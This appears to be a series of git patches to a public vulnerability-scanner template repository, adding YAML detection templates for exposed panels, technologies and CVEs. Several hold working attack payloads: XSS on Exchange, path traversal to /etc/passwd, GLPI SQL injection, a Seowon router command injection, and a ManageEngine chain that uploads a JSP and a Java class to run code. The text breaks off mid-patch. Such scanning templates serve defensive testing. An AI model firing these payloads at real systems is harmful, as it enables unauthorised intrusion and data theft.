https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-41349 + description: "Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305." requests: - raw: From 0e9faf2419857e6c9c4327c757f476917e241bba Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 00:37:40 +0530 Subject: [PATCH 3572/4083] misc updates --- cves/2021/CVE-2021-41349.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index 81a6515656..225d1a6a33 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml @@ -5,6 +5,7 @@ info: author: rootxharsh,iamnoooob severity: medium tags: cve,cve2021,xss,microsoft,exchange + description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305. reference: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 @@ -13,7 +14,6 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.50 cve-id: CVE-2021-41349 - description: "Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305." requests: - raw: @@ -22,13 +22,15 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - <HTTPVOID>&x=1 + %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1 matchers-condition: and matchers: - type: word words: - - '="<HTTPVOID>' + - 'alert(document.domain);' + - 'a=""' + condition: and - type: word part: header From e79f7c4a915815c9cb880b41182457261f54322b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 01:39:02 +0530 Subject: [PATCH 3573/4083] misc updates --- technologies/adfs-detect.yaml | 7 +++---- technologies/argocd-detect.yaml | 11 ++++------- technologies/graphiql-detect.yaml | 11 ++++------- technologies/hashicorp-vault-detect.yaml | 10 +++------- 4 files changed, 14 insertions(+), 25 deletions(-) diff --git a/technologies/adfs-detect.yaml b/technologies/adfs-detect.yaml index 3b5b458190..f9d39f6668 100644 --- a/technologies/adfs-detect.yaml +++ b/technologies/adfs-detect.yaml @@ -5,18 +5,17 @@ info: author: Adam Crosser severity: info description: Detects ADFS with forms-based authentication enabled. - tags: tech,ADFS + tags: tech,adfs requests: - method: GET path: - "{{BaseURL}}/adfs/ls/idpinitiatedsignon.aspx" - redirects: false - stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - '/adfs/portal/css/style.css' - part: body diff --git a/technologies/argocd-detect.yaml b/technologies/argocd-detect.yaml index 8144202189..07b34bdba3 100644 --- a/technologies/argocd-detect.yaml +++ b/technologies/argocd-detect.yaml @@ -5,18 +5,15 @@ info: author: Adam Crosser severity: info description: Detects the Argo CD website console - tags: tech,ArgoCD + tags: tech,argocd requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - redirects: false - stop-at-first-match: false - matchers-condition: and matchers: - type: word - words: - - '<title>Argo CD' part: body + words: + - '<title>Argo CD' \ No newline at end of file diff --git a/technologies/graphiql-detect.yaml b/technologies/graphiql-detect.yaml index fa03944e3a..e5dc4547a3 100644 --- a/technologies/graphiql-detect.yaml +++ b/technologies/graphiql-detect.yaml @@ -5,18 +5,15 @@ info: author: Adam Crosser severity: info description: Detects the GraphiQL application - tags: tech,ADFS + tags: tech,graphiql,graphql requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - redirects: false - stop-at-first-match: true - matchers-condition: or matchers: - type: word - words: - - '<title>GraphiQL' part: body + words: + - '<title>GraphiQL' \ No newline at end of file diff --git a/technologies/hashicorp-vault-detect.yaml b/technologies/hashicorp-vault-detect.yaml index 2317ed9edb..d21944ee2a 100644 --- a/technologies/hashicorp-vault-detect.yaml +++ b/technologies/hashicorp-vault-detect.yaml @@ -5,19 +5,15 @@ info: author: Adam Crosser severity: info description: Detects HashiCorp Vault - tags: tech,HashiCorp,Vault + tags: tech,hashicorp requests: - method: GET path: - "{{BaseURL}}/ui/vault/auth" - redirects: false - stop-at-first-match: true - matchers-condition: and - matchers: - type: word + part: body words: - - '<meta name="vault/config/environment"' - part: body \ No newline at end of file + - '<meta name="vault/config/environment"' \ No newline at end of file From d237c03297abfa9b516b27cb9d93132f7c020743 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 01:42:06 +0530 Subject: [PATCH 3574/4083] misc update --- technologies/spinnaker-detect.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/technologies/spinnaker-detect.yaml b/technologies/spinnaker-detect.yaml index 5f9acf32a4..87fd27d3f2 100644 --- a/technologies/spinnaker-detect.yaml +++ b/technologies/spinnaker-detect.yaml @@ -5,23 +5,20 @@ info: author: Adam Crosser severity: info description: Detects the Spinnaker continuous delivery software - tags: tech,Spinnaker + tags: tech,spinnaker requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - redirects: false - stop-at-first-match: true matchers-condition: or matchers: - type: word + part: body words: - '<spinnaker ng-if="!authenticating"></spinnaker>' - part: body - - type: word - part: header - words: - - 'X-Spinnaker-Priority' + - type: dsl + dsl: + - "contains(tolower(all_headers), 'x-spinnaker-priority')" \ No newline at end of file From 3e1c1f2b4b8888370626130c6f99b93d69546487 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 01:45:29 +0530 Subject: [PATCH 3575/4083] removed extra line --- technologies/adfs-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/adfs-detect.yaml b/technologies/adfs-detect.yaml index f9d39f6668..3097520805 100644 --- a/technologies/adfs-detect.yaml +++ b/technologies/adfs-detect.yaml @@ -12,7 +12,6 @@ requests: path: - "{{BaseURL}}/adfs/ls/idpinitiatedsignon.aspx" - matchers-condition: and matchers: - type: word From 6220525d3ecd43d6ab336d4ae8c8759154778a0f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 02:03:22 +0530 Subject: [PATCH 3576/4083] Added Golang expvar Information Disclosure Co-Authored-By: Luqman <9842995+luqmanhy@users.noreply.github.com> --- exposures/configs/debug-vars.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/configs/debug-vars.yaml diff --git a/exposures/configs/debug-vars.yaml b/exposures/configs/debug-vars.yaml new file mode 100644 index 0000000000..69f0ac8f5f --- /dev/null +++ b/exposures/configs/debug-vars.yaml @@ -0,0 +1,24 @@ +id: debug-vars + +info: + name: Golang expvar Information Disclosure + author: luqman + severity: low + tags: go,debug,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/debug/vars" + + matchers-condition: and + matchers: + - type: word + words: + - '"memstats":' + - '"cmdline":' + condition: and + + - type: status + status: + - 200 \ No newline at end of file From d0f7e52d869c5cdcdcb5f9a42bb5f4da280f4b11 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 13 Nov 2021 12:29:02 +0900 Subject: [PATCH 3577/4083] Create hrsale-unauthenticated-lfi.yaml --- hrsale-unauthenticated-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 hrsale-unauthenticated-lfi.yaml diff --git a/hrsale-unauthenticated-lfi.yaml b/hrsale-unauthenticated-lfi.yaml new file mode 100644 index 0000000000..93e24dde8d --- /dev/null +++ b/hrsale-unauthenticated-lfi.yaml @@ -0,0 +1,24 @@ +id: hrsale-unauthenticated-lfi +info: + name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi + author: 0x_Akoko + severity: high + description: This exploit allow you to download any readable file from server without permission and login session + reference: https://www.exploit-db.com/exploits/48920 + tags: hrsale,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 94cb4a60dcfd96a2e567670a25be16aa68b54689 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 13 Nov 2021 12:35:48 +0900 Subject: [PATCH 3578/4083] Create CVE-2020-19360.yaml --- CVE-2020-19360.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 CVE-2020-19360.yaml diff --git a/CVE-2020-19360.yaml b/CVE-2020-19360.yaml new file mode 100644 index 0000000000..a85a4e43b3 --- /dev/null +++ b/CVE-2020-19360.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-19360 +info: + name: FHEM 6.0 Local File Inclusion + author: 0x_Akoko + severity: high + description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + reference: + - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md + - https://www.cvedetails.com/cve/CVE-2020-19360/ + tags: fhem,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-19360 + +requests: + - method: GET + path: + - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 97a9ebe76bbeafd0b68c79aba8dd1684a84e83a1 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 13 Nov 2021 11:15:49 +0700 Subject: [PATCH 3579/4083] Create api-adoptapet.yaml --- token-spray/api-adoptapet.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 token-spray/api-adoptapet.yaml diff --git a/token-spray/api-adoptapet.yaml b/token-spray/api-adoptapet.yaml new file mode 100644 index 0000000000..05804b6e67 --- /dev/null +++ b/token-spray/api-adoptapet.yaml @@ -0,0 +1,24 @@ +id: api-adoptapet + +info: + name: AdoptAPet API Test + author: daffainfo + severity: info + reference: + - https://www.adoptapet.com/public/apis/pet_list.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/AdoptAPet.md + tags: token-spray,adoptapet + +self-contained: true +requests: + - method: GET + path: + - "https://api.adoptapet.com/search/pets_at_shelter?key={{token}}&v=2&output=json&shelter_id=79570&start_number=1&end_number=500" + + matchers: + - type: word + part: body + words: + - 'returned_pets":' + - 'total_pets":' + condition: and From 85bd79dc0c18fab570d4ab0b00bbe0d89e27ed6f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 13 Nov 2021 11:22:05 +0700 Subject: [PATCH 3580/4083] Update api-adoptapet.yaml --- token-spray/api-adoptapet.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/token-spray/api-adoptapet.yaml b/token-spray/api-adoptapet.yaml index 05804b6e67..8c8b1dfb9b 100644 --- a/token-spray/api-adoptapet.yaml +++ b/token-spray/api-adoptapet.yaml @@ -14,7 +14,6 @@ requests: - method: GET path: - "https://api.adoptapet.com/search/pets_at_shelter?key={{token}}&v=2&output=json&shelter_id=79570&start_number=1&end_number=500" - matchers: - type: word part: body From 5b66093b499035a18d0f434f102c4e4774094253 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 14:30:52 +0530 Subject: [PATCH 3581/4083] matcher improvements --- ...directory-certificate-services-detect.yaml | 34 ------------------- exposed-panels/ms-adcs-detect.yaml | 24 +++++++++++++ 2 files changed, 24 insertions(+), 34 deletions(-) delete mode 100644 exposed-panels/ms-active-directory-certificate-services-detect.yaml create mode 100644 exposed-panels/ms-adcs-detect.yaml diff --git a/exposed-panels/ms-active-directory-certificate-services-detect.yaml b/exposed-panels/ms-active-directory-certificate-services-detect.yaml deleted file mode 100644 index eec236aa90..0000000000 --- a/exposed-panels/ms-active-directory-certificate-services-detect.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: ms-active-directory-certificate-services-detect - -info: - name: MS Active Directory Certificate Services Detector - author: divya_mudgal - severity: info - tags: ms,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - 301 - condition: or - - - type: word - words: - - "/certsrv" - - "/certsrv/" - - "/certsrv/Default.asp" - - "/CertSrv" - - "/CertSrv/" - - "/CertSrv/Default.asp" - part: header - condition: or diff --git a/exposed-panels/ms-adcs-detect.yaml b/exposed-panels/ms-adcs-detect.yaml new file mode 100644 index 0000000000..7c7973101e --- /dev/null +++ b/exposed-panels/ms-adcs-detect.yaml @@ -0,0 +1,24 @@ +id: ms-adcs-detect + +info: + name: MS Active Directory Certificate Services Detector + author: divya_mudgal + severity: info + tags: microsoft,ad,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - 301 + condition: or + + - type: dsl + dsl: + - "contains(tolower(all_headers), '/certsrv')" \ No newline at end of file From 12b072ea1ff06813c9b0d8ba05e2b57b41a87c3c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 14:34:13 +0530 Subject: [PATCH 3582/4083] Added extractor to print target URL --- exposed-panels/ms-adcs-detect.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposed-panels/ms-adcs-detect.yaml b/exposed-panels/ms-adcs-detect.yaml index 7c7973101e..9e68e83642 100644 --- a/exposed-panels/ms-adcs-detect.yaml +++ b/exposed-panels/ms-adcs-detect.yaml @@ -21,4 +21,9 @@ requests: - type: dsl dsl: - - "contains(tolower(all_headers), '/certsrv')" \ No newline at end of file + - "contains(tolower(all_headers), '/certsrv')" + + extractors: + - type: kval + kval: + - location \ No newline at end of file From b0860f227598c0f1997a7efd54d6174aa66ddd37 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 16:36:43 +0530 Subject: [PATCH 3583/4083] Template update to confirm RCE --- cves/2021/CVE-2021-40539.yaml | 95 +++++++++++++++++++++++++++++++---- 1 file changed, 85 insertions(+), 10 deletions(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 0da6945312..5941d3cd40 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -1,14 +1,16 @@ id: CVE-2021-40539 info: - name: Zoho ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE - author: daffainfo + name: ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + author: daffainfo,pdteam severity: critical - description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. + description: ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 - tags: cve,cve2021,rce,zoho + - https://github.com/synacktiv/CVE-2021-40539 + tags: cve,cve2021,rce,ad classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 @@ -21,18 +23,91 @@ requests: - | POST /./RestAPI/LogonCustomization HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Content-Length: 27 + Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 - methodToCall=previewMobLogo + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="methodToCall" + + unspecified + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="Save" + + yes + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="form" + + smartcard + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="operation" + + Add + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2021-40539"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i<digest.length;i++){ + hx = Integer.toHexString(0xFF & digest[i]); + if(hx.length() == 1){hx = "0" + hx;} + hashedpasswd.append(hx); + } + out.println(hashedpasswd.toString()); + %> + --8b1ab266c41afb773af2e064bc526458-- + + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b + + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="methodToCall" + + unspecified + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="Save" + + yes + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="form" + + smartcard + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="operation" + + Add + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" + + {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} + --43992a07d9a30213782780204a9f032b-- + + - | + POST /./RestAPI/Connection HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 + + - | + GET /help/admin-guide/test.jsp HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: + - type: word words: - - '<script type="text/javascript">var d = new Date();window.parent.$("#mobLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());window.parent.$("#tabLogo").attr("src","/temp/tempMobPreview.jpeg?"+d.getTime());</script>' - part: body + - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 - type: status status: - - 200 + - 200 \ No newline at end of file From 2809a60004331f8c13afb320f53e10805da5a742 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 19:56:16 +0530 Subject: [PATCH 3584/4083] Added Pre-authenticated SQL injection in GLPI <= 9.3.3 (CVE-2019-10232) --- cves/2019/CVE-2019-10232.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-10232.yaml diff --git a/cves/2019/CVE-2019-10232.yaml b/cves/2019/CVE-2019-10232.yaml new file mode 100644 index 0000000000..91804d9ee4 --- /dev/null +++ b/cves/2019/CVE-2019-10232.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-10232 + +info: + name: Pre-authenticated SQL injection in GLPI <= 9.3.3 + author: RedTeamBrasil + severity: high + description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication. + reference: + - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf + - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c + tags: cve,cve2019,glpi,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "-MariaDB-" + - "Start unlock script" + condition: and + + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" From 19f522f9e5ae182f7f898e97868b98d52b9a07c6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 13 Nov 2021 14:29:44 +0000 Subject: [PATCH 3585/4083] Auto Generated CVE annotations [Sat Nov 13 14:29:44 UTC 2021] :robot: --- cves/2019/CVE-2019-10232.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-10232.yaml b/cves/2019/CVE-2019-10232.yaml index 91804d9ee4..f9b9155fc7 100644 --- a/cves/2019/CVE-2019-10232.yaml +++ b/cves/2019/CVE-2019-10232.yaml @@ -3,12 +3,17 @@ id: CVE-2019-10232 info: name: Pre-authenticated SQL injection in GLPI <= 9.3.3 author: RedTeamBrasil - severity: high + severity: critical description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication. reference: - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c tags: cve,cve2019,glpi,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10232 + cwe-id: CWE-89 requests: - method: GET From 6c64c42dc024a707b2981f40bb07fbbd4598b39c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 22:14:58 +0530 Subject: [PATCH 3586/4083] misc updates --- default-logins/pentaho/pentaho-default-login.yaml | 3 ++- network/samba-detect.yaml | 5 ++++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/default-logins/pentaho/pentaho-default-login.yaml b/default-logins/pentaho/pentaho-default-login.yaml index 0963f688ac..a91dfc9bd8 100644 --- a/default-logins/pentaho/pentaho-default-login.yaml +++ b/default-logins/pentaho/pentaho-default-login.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: high metadata: - shodan-query: 'pentaho' + shodan-query: pentaho tags: pentaho,default-login requests: @@ -14,6 +14,7 @@ requests: POST /pentaho/j_spring_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + j_username={{user}}&j_password={{pass}} attack: pitchfork diff --git a/network/samba-detect.yaml b/network/samba-detect.yaml index 76a3baaf40..1dd94f2eda 100644 --- a/network/samba-detect.yaml +++ b/network/samba-detect.yaml @@ -1,16 +1,19 @@ id: samba-detection + info: name: samba detection author: pussycat0x severity: info - tags: network,smb, samba + tags: network,smb,samba network: - inputs: - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 type: hex + host: - "{{Hostname}}" - "{{Hostname}}:139" + matchers: - type: word words: From b2aa8f9f5b2e70a7b725cb79c00ed50cdd1cac48 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 13 Nov 2021 23:01:53 +0530 Subject: [PATCH 3587/4083] misc updates --- cves/2019/CVE-2019-1821.yaml | 12 +++--------- cves/2021/CVE-2021-40539.yaml | 2 +- vulnerabilities/other/seowon-router-rce.yaml | 5 ++--- 3 files changed, 6 insertions(+), 13 deletions(-) diff --git a/cves/2019/CVE-2019-1821.yaml b/cves/2019/CVE-2019-1821.yaml index dc80c371b1..94b84c2ebf 100644 --- a/cves/2019/CVE-2019-1821.yaml +++ b/cves/2019/CVE-2019-1821.yaml @@ -1,17 +1,16 @@ id: CVE-2019-1821 info: - name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821) + name: Cisco Prime Infrastructure Unauthorized RCE author: _0xf4n9x_ severity: critical description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. reference: - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821 metadata: shodan-query: 'http.title:"prime infrastructure"' - tags: rce,fileupload,unauth,cve,cve2019 + tags: cve,cve2019,rce,fileupload,unauth,intrusive classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 @@ -23,9 +22,7 @@ requests: - | POST /servlet/UploadServlet HTTP/1.1 Host: {{Hostname}} - Connection: close Accept-Encoding: gzip, deflate - Accept: */* Primary-IP: 127.0.0.1 Filename: test.tar Filesize: 10240 @@ -44,14 +41,11 @@ requests: - | GET /test.txt HTTP/1.1 Host: {{Host}} - Connection: close - Accept-Encoding: gzip, deflate - Accept: */* req-condition: true matchers: - type: dsl dsl: - - "status_code==200" + - "status_code == 200" - "contains((body_2), '{{randstr}}')" condition: and diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 5941d3cd40..627a096956 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -10,7 +10,7 @@ info: - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 - https://github.com/synacktiv/CVE-2021-40539 - tags: cve,cve2021,rce,ad + tags: cve,cve2021,rce,ad,intrusive classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml index 96ad415823..306a4dfa29 100644 --- a/vulnerabilities/other/seowon-router-rce.yaml +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -1,12 +1,12 @@ id: seowon-router-rce info: - name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated) + name: Seowon 130-SLC router - Remote Code Execution author: gy741 severity: critical description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page reference: https://www.exploit-db.com/exploits/50295 - tags: rce,seowon,router,unauth + tags: rce,seowon,router,unauth,iot requests: - raw: @@ -16,7 +16,6 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/diagnostic.html?t=201701020919 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin - Connection: keep-alive Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928 From d780d03ab5fc997fadf495953071fc96a1bd250a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sat, 13 Nov 2021 23:33:07 +0530 Subject: [PATCH 3588/4083] Update api-adoptapet.yaml --- token-spray/api-adoptapet.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/token-spray/api-adoptapet.yaml b/token-spray/api-adoptapet.yaml index 8c8b1dfb9b..485b64da0a 100644 --- a/token-spray/api-adoptapet.yaml +++ b/token-spray/api-adoptapet.yaml @@ -14,6 +14,7 @@ requests: - method: GET path: - "https://api.adoptapet.com/search/pets_at_shelter?key={{token}}&v=2&output=json&shelter_id=79570&start_number=1&end_number=500" + matchers: - type: word part: body From 